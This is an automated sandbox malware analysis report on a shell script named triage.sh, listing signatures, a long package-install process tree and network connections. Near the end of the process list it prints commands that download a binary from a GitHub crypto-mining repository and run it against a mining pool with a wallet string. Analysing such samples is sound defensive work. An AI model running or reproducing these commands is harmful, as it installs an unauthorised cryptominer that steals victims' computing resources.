Malware Analysis Report

2024-10-16 05:32

Sample ID 240713-wzef7asalr
Target triage.sh
SHA256 d02b94e23830079206ce75fd7232bf4f68f86703f08de981107a8f9ff49d9bac
Tags antivm
Score 7/10

Analysis Overview

Score 7/10
SHA256 d02b94e23830079206ce75fd7232bf4f68f86703f08de981107a8f9ff49d9bac

Threat Level: Shows suspicious behavior

The file triage.sh shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks mountinfo of local process

Deletes log files

Legitimate hosting services abused for malware hosting/C2

Write file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-07-13 18:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-07-13 18:21
Reported 2024-07-13 18:25
Platform ubuntu2404-amd64-20240523-en
Max time kernel 5s
Max time network 81s

Command Line

[/tmp/triage.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /var/lib/dpkg/tmp.ci/preinst /var/lib/dpkg/tmp.ci/preinst N/A
N/A /var/lib/dpkg/info/automake.postinst /var/lib/dpkg/info/automake.postinst N/A
N/A /tmp/cc /tmp/cc N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Deletes log files

Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/autom4te.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoreconf.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/c_rehash.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/openssl.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoscan.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/dh_autotools-dev_restoreconfig.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoconf.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoupdate.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/automake-1.16.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/curl-config.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoheader.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/ifnames.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/dh_autotools-dev_updateconfig.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/aclocal-1.16.dpkg-new /usr/bin/dpkg N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/setpriv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/loginuid /usr/bin/sudo N/A
File opened for reading /proc/self/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/kernel/random/boot_id /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/seccomp/actions_avail /usr/bin/sudo N/A
File opened for reading /proc/1/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/sudo N/A
File opened for reading /proc/1/limits /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/apt-get N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/2596/status /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt-get N/A
File opened for reading /proc/2471/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/1/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/wget N/A
File opened for reading /proc/2472/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/cc /usr/bin/wget N/A

Processes

/tmp/triage.sh

[/tmp/triage.sh]

/usr/bin/sudo

[sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y]

/usr/bin/apt-get

[apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --configure libssl3t64:amd64]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure --recursive /tmp/apt-dpkg-install-EKjVwL]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f]

/usr/bin/tar

[tar -x -f]

/var/lib/dpkg/tmp.ci/preinst

[/var/lib/dpkg/tmp.ci/preinst install]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/openssl.postinst

[/var/lib/dpkg/info/openssl.postinst configure 3.0.13-0ubuntu3]

/var/lib/dpkg/info/automake.postinst

[/var/lib/dpkg/info/automake.postinst configure ]

/usr/bin/update-alternatives

[update-alternatives --install /usr/bin/automake automake /usr/bin/automake-1.16 34 --slave /usr/bin/aclocal aclocal /usr/bin/aclocal-1.16 --slave /usr/share/man/man1/automake.1.gz automake.1.gz /usr/share/man/man1/automake-1.16.1.gz --slave /usr/share/man/man1/aclocal.1.gz aclocal.1.gz /usr/share/man/man1/aclocal-1.16.1.gz]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/var/lib/dpkg/info/libc-bin.postinst

[/var/lib/dpkg/info/libc-bin.postinst triggered ldconfig]

/usr/sbin/ldconfig

[ldconfig -r /]

/sbin/ldconfig.real

[/sbin/ldconfig.real -r /]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc]

/usr/bin/chmod

[chmod +x cc]

/usr/bin/clear

[clear]

/usr/bin/nproc

[nproc]

/tmp/cc

[./cc -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Triage -p x -t 1]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.81:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp

Files
